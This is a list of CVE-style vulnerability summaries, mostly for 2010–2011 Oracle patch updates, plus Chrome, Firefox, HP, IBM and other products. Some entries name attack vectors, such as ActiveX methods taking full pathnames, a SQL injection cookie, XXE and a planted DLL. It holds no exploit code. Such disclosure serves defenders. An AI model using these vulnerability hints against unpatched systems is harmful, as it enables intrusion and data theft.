Unspecified vulnerability in the Client System Analyzer component in Oracle Database Server 11.1.0.7 and 11.2.0.1 and Enterprise Manager Grid Control 10.2.0.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the January 2011 CPU.  Oracle has not commented on claims from a reliable third party coordinator that this issue involves an exposed JSP script that accepts XML uploads in conjunction with NULL bytes in an unspecified parameter that allow execution of arbitrary code.
Unspecified vulnerability in the Oracle Document Capture component in Oracle Fusion Middleware 10.1.3.4 and 10.1.3.5 allows remote attackers to affect integrity and availability via unknown vectors related to Import Server.  NOTE: the previous information was obtained from the January 2011 CPU.  Oracle has not commented on claims from the original researcher that remote attackers can overwrite arbitrary files and execute arbitrary code via a full pathname in the first argument to the WriteJPG method in the NCSECWLib ActiveX control.
Unspecified vulnerability in the Oracle Document Capture component in Oracle Fusion Middleware 10.1.3.4 and 10.1.3.5 allows remote attackers to affect integrity via unknown vectors related to Import Export Utility.
Unspecified vulnerability in the mod_ssl component in Oracle Secure Backup 10.3.0.2 allows remote attackers to affect integrity and availability via unknown vectors.
Unspecified vulnerability in the Oracle Document Capture component in Oracle Fusion Middleware 10.1.3.4 and 10.1.3.5 allows remote attackers to affect confidentiality via unknown vectors related to Import Server.  NOTE: the previous information was obtained from the January 2011 CPU.  Oracle has not commented on claims from the original researcher that remote attackers can read arbitrary files via a full pathname in the first argument to the ImportBodyText method in the EasyMail ActiveX control (emsmtp.dll).
Unspecified vulnerability in the Real User Experience Insight component in Oracle Enterprise Manager Grid Control 6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Processing.  NOTE: the previous information was obtained from the January 2011 CPU.  Oracle has not commented on claims from a reliable third party coordinator that this is SQL injection in rsynclogdird involving improper escaping of UTF-8 characters while processing log files.
Unspecified vulnerability in the Health Sciences - Oracle Argus Safety component in Oracle Industry Applications 5.0, 5.0.1, 5.0.2, and 5.0.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Login and LDAP.
Unspecified vulnerability in the Oracle Document Capture component in Oracle Fusion Middleware 10.1.3.4 and 10.1.3.5 allows remote attackers to affect integrity and availability via unknown vectors related to Internal Operations.
Unspecified vulnerability in the Oracle Document Capture component in Oracle Fusion Middleware 10.1.3.4 and 10.1.3.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Internal Operations.  NOTE: the previous information was obtained from the January 2011 CPU.  Oracle has not commented on claims from the original researcher that remote attackers can overwrite or delete arbitrary files via a full pathname in the second argument to the DownloadSingleMessageToFile method in the EMPOP3Lib ActiveX component (empop3.dll).
Unspecified vulnerability in the Oracle Application Object Library component in Oracle Applications 11.5.10.2, 12.0.4, 12.0.5, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Logout.
Unspecified vulnerability in the Oracle Common Applications component in Oracle Applications 11.5.10.2, 12.0.4, 12.0.5, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to User Management.
Unspecified vulnerability in Oracle Solaris 9 allows local users to affect confidentiality and integrity via unknown vectors related to XScreenSaver.
Unspecified vulnerability in the OracleVM component in Oracle VM 2.2.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to ovs-agent. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a third party researcher that this is related to the exposure of unspecified functions using XML-RPC.
Unspecified vulnerability in the Oracle VM component in Oracle VM 2.2.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to ovs-agent.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a third party researcher that this is related to the storage of passwords and password hashes in cleartext in files with insecure permissions.
Unspecified vulnerability in the OracleVM component in Oracle VM 2.2.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to ovs-agent. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a third party researcher that this is related to the exposure of multiple unspecified functions through XML-RPC that allow execution of arbitrary OS commands.
Unspecified vulnerability in the OracleVM component in Oracle VM 2.2.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to ovs-agent.
Unspecified vulnerability in the BPEL Console component in Oracle Fusion Middleware 11.1.1.1.0 and 11.1.1.2.0 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in Oracle OpenSolaris allows local users to affect availability via unknown vectors related to Kernel/File System.
Unspecified vulnerability in the (1) Sun Convergence 1 and (2) Sun Java Communications Suite 7 components in Oracle Sun Products Suite 1.0 and 7.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Webmail.
Unspecified vulnerability in Oracle OpenSolaris allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Depot Server.
Unspecified vulnerability in the Oracle Communications Messaging Server (Sun Java System Messaging Server) component in Oracle Sun Products Suite 6.0, 6.2, 6.3, and 7.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Mail.
Unspecified vulnerability in the Networking component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that HttpURLConnection does not properly check for the allowHttpTrace permission, which allows untrusted code to perform HTTP TRACE requests.
Unspecified vulnerability in the Networking component in Oracle Java SE and Java for Business 6 Update 21 and 5.0 Update 25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that this is related to missing validation of request headers in the HttpURLConnection class when they are set by applets, which allows remote attackers to bypass the intended security policy.
Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the 2D component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this is an integer overflow in the color profile parser that allows remote attackers to execute arbitrary code via a crafted Tag structure in a color profile.
Unspecified vulnerability in the Deployment Toolkit component in Oracle Java SE and Java for Business 6 Update 21 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, and 1.4.2_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that this allows remote attackers to execute arbitrary code by causing the defaultReadObject method in the Serialization API to set a volatile field multiple times.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, and 1.4.2_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that this is a race condition related to deserialization.
Unspecified vulnerability in the 2D component in Oracle Java SE and Java for Business 6 Update 21, and 5.0 Update 25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that this is related to a calculation error in right-to-left text character counts for the ICU OpenType font rendering implementation, which triggers an out-of-bounds memory access.
Unspecified vulnerability in the 2D component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update and 25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this is an integer overflow that leads to a buffer overflow via a crafted devs (device information) tag structure in a color profile.
Unspecified vulnerability in the 2D component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, and 1.4.2_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this is an integer overflow that triggers memory corruption via large values in a subsample of a JPEG image, related to JPEGImageWriter.writeImage in the imageio API.
Unspecified vulnerability in the Oracle Communications Messaging Server (Sun Java System Messaging Server) component in Oracle Sun Products Suite 7.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Webmail.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that the Kerberos implementation does not properly check AP-REQ requests, which allows attackers to cause a denial of service in the JVM.  NOTE: CVE has not investigated the apparent discrepancy between the two vendors regarding the consequences of this issue.
Unspecified vulnerability in the Deployment component in Oracle Java SE and Java for Business 6 Update 21 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable researcher that this is related to "how Web Start retrieves security policies," BasicServiceImpl, and forged policies that bypass sandbox restrictions.
Unspecified vulnerability in the 2D component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that this is a double free vulnerability in IndexColorModel that allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code.
Unspecified vulnerability in the CORBA component in Oracle Java SE and Java for Business 6 Update 21 and 5.0 Update 25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that this involves the use of the privileged accept method in the ServerSocket class, which does not limit which hosts can connect and allows remote attackers to bypass intended network access restrictions.
Unspecified vulnerability in the Networking component in Oracle Java SE and Java for Business 6 Update 21 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this involves an incorrect sign extension in the HeadspaceSoundbank.nGetName function, which allows attackers to execute arbitrary code via a crafted BANK record that leads to a buffer overflow.
Unspecified vulnerability in the Java Web Start component in Oracle Java SE and Java for Business 6 Update 21 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Swing component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that this is related to the modification of "behavior and state of certain JDK classes" and "mutable static."
Unspecified vulnerability in the 2D component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Deployment component in Oracle Java SE and Java for Business 6 Update 21 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the January 2011 CPU. Oracle has not commented on claims from a reliable third party coordinator that the ActiveX Plugin does not properly initialize an object field that is used as a window handle, which allows attackers to execute arbitrary code.
Unspecified vulnerability in the CORBA component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that this is related to "permissions granted to certain system objects."
Unspecified vulnerability in the Swing component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that this is related to unsafe reflection involving the UIDefault.ProxyLazyValue class.
Unspecified vulnerability in the New Java Plug-in component in Oracle Java SE and Java for Business 6 Update 21 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Networking component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, and 1.4.2_27 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Java Web Start component in Oracle Java SE and Java for Business 6 Update 21 and 5.0 Update 25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Networking component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that this is an HTTP request splitting vulnerability involving the handling of the chunked transfer encoding method by the HttpURLConnection class.
Unspecified vulnerability in the Java Naming and Directory Interface (JNDI) component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, and 1.4.2_27 allows remote attackers to affect confidentiality via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that this allows remote attackers to determine internal IP addresses or "otherwise-protected internal network names."
Unspecified vulnerability in the PeopleSoft FMS ESA - EX component in Oracle PeopleSoft and JDEdwards Suite 8.9 Bundle #38, 9.0 Bundle #31, and 9.1 Bundle #6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Sun Java System Identity Manager component in Oracle Sun Products Suite 8.1 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle iPlanet Web Server (Sun Java System Web Server) component in Oracle Sun Products Suite 7.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Administration.
Unspecified vulnerability in the Oracle iPlanet Web Server (Sun Java System Web Server) component in Oracle Sun Products Suite 7.0 allows remote attackers to affect integrity and availability via unknown vectors related to Administration.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable source that this is cross-site request forgery (CSRF) that allows remote attackers to stop an instance via the management console.
Unspecified vulnerability in the Networking component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the October 2010 CPU.  Oracle has not commented on claims from a reliable downstream vendor that this is related to missing validation of request headers in the HttpURLConnection class when they are set by applets, which allows remote attackers to bypass the intended security policy.
Unspecified vulnerability in the PeopleSoft Enterprise FMS - GL component in Oracle PeopleSoft and JDEdwards Suite 8.9 Bundle #38, 9.0 Bundle #31, and 9.1 Bundle #6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2010-3538.
Unspecified vulnerability in the PeopleSoft Enterprise FMS - GL component in Oracle PeopleSoft and JDEdwards Suite 8.9 Bundle #38, 9.0 Bundle #31, and 9.1 Bundle #6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2010-3539.
Unspecified vulnerability in the PeopleSoft Enterprise FMS - AM component in Oracle PeopleSoft and JDEdwards Suite 8.9 Bundle #38, 9.0 Bundle #31, and 9.1 Bundle #6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise SCM component in Oracle PeopleSoft and JDEdwards Suite 8.9 Bundle #38, 9.0 Bundle #31, and 9.1 Bundle #6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Directory Server Enterprise Edition component in Oracle Sun Products Suite 6.0, 6.1, 6.2, and 6.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Identity Synchronization for Windows.
Unspecified vulnerability in the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 6.21.3.0 and 7.0.1.0 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to the Project Management Module.
Unspecified vulnerability in the PeopleSoft Enterprise SCM OM and CRM Order Capture component in Oracle PeopleSoft and JDEdwards Suite 8.9, 9.0, and 9.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise CRM - Order Capture component in Oracle PeopleSoft and JDEdwards Suite 9.0 Bundle #28 and 9.1 Bundle #4 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise FMS ESA - RM component in Oracle PeopleSoft and JDEdwards Suite 8.9 Bundle #38, 9.0 Bundle #31, and 9.1 Bundle #6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HCM - HR component in Oracle PeopleSoft and JDEdwards Suite 9.0 Bundle #13 and 9.1 Bundle #3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise FMS - Cash Management component in Oracle PeopleSoft and JDEdwards Suite 8.9 Bundle #38, 9.0 Bundle #31, and 9.1 Bundle #6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise CRM - Common Components component in Oracle PeopleSoft and JDEdwards Suite 8.9 Bundle #41, 9.0 Bundle #28, and 9.1 Bundle #4 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise FMS - AM component in Oracle PeopleSoft and JDEdwards Suite 8.9 Bundle #38, 9.0 Bundle #31, and 9.1 Bundle #6 allows remote authenticated users to affect integrity and availability via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise SCM - PO component in Oracle PeopleSoft and JDEdwards Suite 8.9 Bundle #38, 9.0 Bundle #31, and 9.1 Bundle #6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the (1) PeopleSoft Enterprise FMS, (2) SCM, (3) EPM, (4) CRM, and (5) Campus Solutions components in Oracle PeopleSoft and JDEdwards Suite 8.9, 9.0, and 9.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise SCM - Strategic Sourcing component in Oracle PeopleSoft and JDEdwards Suite 8.9 Bundle #38, 9.0 Bundle #31, and 9.1 Bundle #6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft and JDEdwards Suite 8.49.28 and 8.50.12 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft and JDEdwards Suite 8.49.28 and 8.50.12 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HCM ePay component in Oracle PeopleSoft and JDEdwards Suite 9.0 to Payroll Update 10-C and 9.1 to Payroll Update 10-C allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HCM - GP France component in Oracle PeopleSoft and JDEdwards Suite 8.81 SP1 Bundle #12, 8.9 GP Update 2010-E, 9.0 GP Update 2010-E, and 9.1 GP Update 2010-E allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft and JDEdwards Suite 8.49.28 and 8.50.12 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HCM GP - Japan component in Oracle PeopleSoft and JDEdwards Suite 8.81 SP1 Bundle #13, 8.9 GP Update 2010-E, 9.0 GP Update 2010-E, and 9.1 GP Update 2010-E allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in Oracle Solaris 10 and OpenSolaris allows local users to affect availability via unknown vectors related to InfiniBand.
Unspecified vulnerability in the Solaris component in Oracle Solaris 9 and 10, and OpenSolaris, allows local users to affect availability via unknown vectors related to Kernel/Disk Driver.
Unspecified vulnerability in the Oracle iPlanet Web Server (Sun Java System Web Server) component in Oracle Sun Products Suite 6.1 and 7.0 allows remote attackers to affect integrity via unknown vectors related to Web Container.
Unspecified vulnerability in Oracle Solaris 9 and 10, and OpenSolaris, allows local users to affect integrity and availability via unknown vectors related to Device Drivers.
Unspecified vulnerability in Oracle OpenSolaris allows local users to affect integrity and availability via unknown vectors related to Tooltalk.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.0, 9.1, 9.2.3, 10.0.2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Node Manager.
Unspecified vulnerability in Oracle Solaris 8, 9, and 10 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Scheduler.
Unspecified vulnerability in Oracle Solaris 10 allows local users to affect confidentiality and integrity via unknown vectors related to Solaris Zones.
Unspecified vulnerability in Oracle Solaris 8, 9, and 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Live Upgrade.
Unspecified vulnerability in the Oracle Explorer (Sun Explorer) component in Oracle Sun Products Suite 6.4 allows local users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Agile Core component in Oracle Supply Chain Products Suite 9.3.0.2 and 9.3.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Folders, Files &amp; Attachments, a different vulnerability than CVE-2010-4429.
Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.2 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in Oracle Solaris 10 and OpenSolaris allows local users to affect confidentiality and integrity via unknown vectors related to su.
Unspecified vulnerability in the Siebel Core component in Oracle Siebel Suite 7.7.2.12, 7.8.2.14, 8.0.0.10, and 8.1.1.3 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the OID component in Oracle Fusion Middleware 10.1.2.3, 10.1.4.3, and 11.1.1.2.0 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Siebel Core - Highly Interactive Client component in Oracle Siebel Suite 7.7.2.12, 7.8.2.14, 8.0.0.10, and 8.1.1.3 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2010-2405.
SQL injection vulnerability in common.php in LightNEasy 3.2.1 allows remote attackers to execute arbitrary SQL commands via the userhandle cookie to LightNEasy.php, a different vector than CVE-2008-6593.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Stack consumption vulnerability in the dissect_ber_unknown function in epan/dissectors/packet-ber.c in the BER dissector in Wireshark 1.4.x before 1.4.1 and 1.2.x before 1.2.12 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a long string in an unknown ASN.1/BER encoded packet, as demonstrated using SNMP.
Google Chrome before 6.0.472.59 on Linux does not properly implement the Khmer locale, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 6.0.472.59 does not properly implement Geolocation, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 6.0.472.59 on Mac OS X does not properly implement file dialogs, which allows attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.  NOTE: this issue exists because of an incorrect fix for CVE-2010-3112 on Mac OS X.
Unspecified vulnerability in the pop-up blocking functionality in Google Chrome before 6.0.472.59 allows remote attackers to cause a denial of service (application crash) via unknown vectors.
Unspecified vulnerability in sa_snap in the bos.esagent fileset in IBM AIX 5.3 allows local users to leverage system group membership and delete files via unknown vectors.
Unspecified vulnerability in the webcontainer implementation in IBM Lotus Sametime Connect 8.5.1 before CF1 has unknown impact and attack vectors, aka SPRs LXUU87S57H and LXUU87S93W.
The XML parser in Splunk 4.0.0 through 4.1.4 allows remote authenticated users to obtain sensitive information and gain privileges via an XML External Entity (XXE) attack to unknown vectors.
Unspecified vulnerability in HP Systems Insight Manager (SIM) before 6.2 allows remote authenticated users to gain privileges via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP Systems Insight Manager (SIM) before 6.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability on HP ProCurve Access Points, Access Controllers, and Mobility Controllers with software 5.1.x through 5.1.9, 5.2.x through 5.2.7, 5.3.x through 5.3.5, and 5.4.x through 5.4.0 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Systems Insight Manager (SIM) 6.0 and 6.1 allows remote attackers to read arbitrary files via unknown vectors.
Unspecified vulnerability in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP System Management Homepage (SMH) before 6.2 allows remote attackers to obtain sensitive information via unknown vectors.
Directory traversal vulnerability in RSA Authentication Agent 7.0 before P2 for Web allows remote attackers to read unspecified data via unknown vectors.
Google Chrome before 6.0.472.53 and webkitgtk before 1.2.6 do not properly handle counter nodes, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
The WebSockets implementation in Google Chrome before 6.0.472.53 does not properly handle integer values, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
The implementation of notification permissions in Google Chrome before 6.0.472.53 allows attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the Notifications presenter in Google Chrome before 6.0.472.53 allows attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in Google Chrome before 6.0.472.53 allows remote attackers to enumerate the set of installed extensions via unknown vectors.
Google Chrome before 6.0.472.53 does not properly implement SVG filters, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors, related to a "stale pointer" issue.
Google Chrome before 6.0.472.53 does not properly handle the _blank value for the target attribute of unspecified elements, which allows remote attackers to bypass the pop-up blocker via unknown vectors.
Unspecified vulnerability in the DB2STST program in IBM DB2 9.1 before FP9, 9.5 before FP6, and 9.7 before FP2 has unknown impact and attack vectors.
Untrusted search path vulnerability in Adobe Captivate 5.0.0.596, and possibly other versions, allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse dwmapi.dll that is located in the same folder as a .cptx file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 3.5.x before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 3.6.x before 3.6.11 and Thunderbird 3.1.x before 3.1.5 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in the browser engine in Mozilla Firefox 3.5.x before 3.5.14, Thunderbird before 3.0.9, and SeaMonkey before 2.0.9 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.5.12 and 3.6.x before 3.6.9, Thunderbird before 3.0.7 and 3.1.x before 3.1.3, and SeaMonkey before 2.0.7 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Google Chrome before 5.0.375.127 does not properly implement the Geolocation feature, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 5.0.375.127 and webkitgtk before 1.2.6 do not properly support the Ruby language, which allows attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 5.0.375.127 does not properly implement the notifications feature, which allows remote attackers to cause a denial of service (application crash) and possibly have unspecified other impact via unknown vectors.
Google Chrome before 5.0.375.127, and webkitgtk before 1.2.5, does not properly handle SVG documents, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors related to state changes when using DeleteButtonController.
Google Chrome before 5.0.375.127 does not properly implement file dialogs, which allows attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 6.0.472.53 does not properly mitigate an unspecified flaw in the Windows kernel, which has unknown impact and attack vectors, a different vulnerability than CVE-2010-2897.
The PluginGetDriverFile function in Novell iPrint Client before 5.44 interprets an uninitialized memory location as a pointer value, which allows remote attackers to execute arbitrary code via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the message-protocol implementation in the Mount service in IBM Tivoli Storage Manager (TSM) FastBack 5.x.x before 5.5.7, and 6.1.0.0, allows remote attackers to cause a denial of service (recovery failure), and possibly trigger loss of data, via unknown vectors.
Unspecified vulnerability in the message-protocol implementation in the Server in IBM Tivoli Storage Manager (TSM) FastBack 5.x.x before 5.5.7, and 6.1.0.0, allows remote attackers to cause a denial of service (daemon outage) via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in Tomaz Muraus Open Blog 1.2.1, and possibly earlier, allows remote attackers to hijack the authentication of administrators for requests that change the administrative password.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in RSA Access Manager Agent 4.7.1 before 4.7.1.7, when RSA Adaptive Authentication Integration is enabled, allows remote attackers to bypass authentication and obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP System Management Homepage (SMH) for Linux 6.0 and 6.1 allows remote authenticated users to obtain sensitive information and gain root privileges via unknown vectors.
Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 on Windows allows local users to gain privileges or cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3007.
